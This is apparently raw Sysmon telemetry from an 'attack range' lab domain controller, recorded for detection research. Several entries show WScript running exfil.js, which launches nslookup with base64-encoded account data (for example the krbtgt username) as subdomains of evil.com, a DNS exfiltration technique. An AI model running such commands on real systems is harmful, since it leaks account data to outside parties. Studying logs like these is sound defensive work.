14:21:42.454{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2645-000000005F02}5420C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.438{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.438{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2545-000000005F02}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.438{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.438{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.438{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.438{2E1864BB-18E0-629A-6742-000000005F02}39762244C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-2545-000000005F02}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.449{2E1864BB-18F6-629A-2545-000000005F02}4036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvgzw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.438{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfkqf.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.407{2E1864BB-18F6-629A-2345-000000005F02}44843500C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2445-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.407{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2445-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.407{2E1864BB-18F6-629A-2245-000000005F02}81287176C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-2445-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.415{2E1864BB-18F6-629A-2445-000000005F02}5124C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-2245-000000005F02}8128C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfkqf.tmp 2>&1 10341000x8000000000000000212635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.391{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2345-000000005F02}4484C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.391{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2345-000000005F02}4484C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.389{2E1864BB-18F6-629A-2345-000000005F02}44843500C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2245-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.369{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2345-000000005F02}4484C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.369{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.369{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.369{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.369{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.369{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2245-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.369{2E1864BB-18E0-629A-6742-000000005F02}39762240C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-2245-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.370{2E1864BB-18F6-629A-2245-000000005F02}8128C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfkqf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.353{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwpx.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.338{2E1864BB-18F6-629A-2045-000000005F02}39685168C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2145-000000005F02}4040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 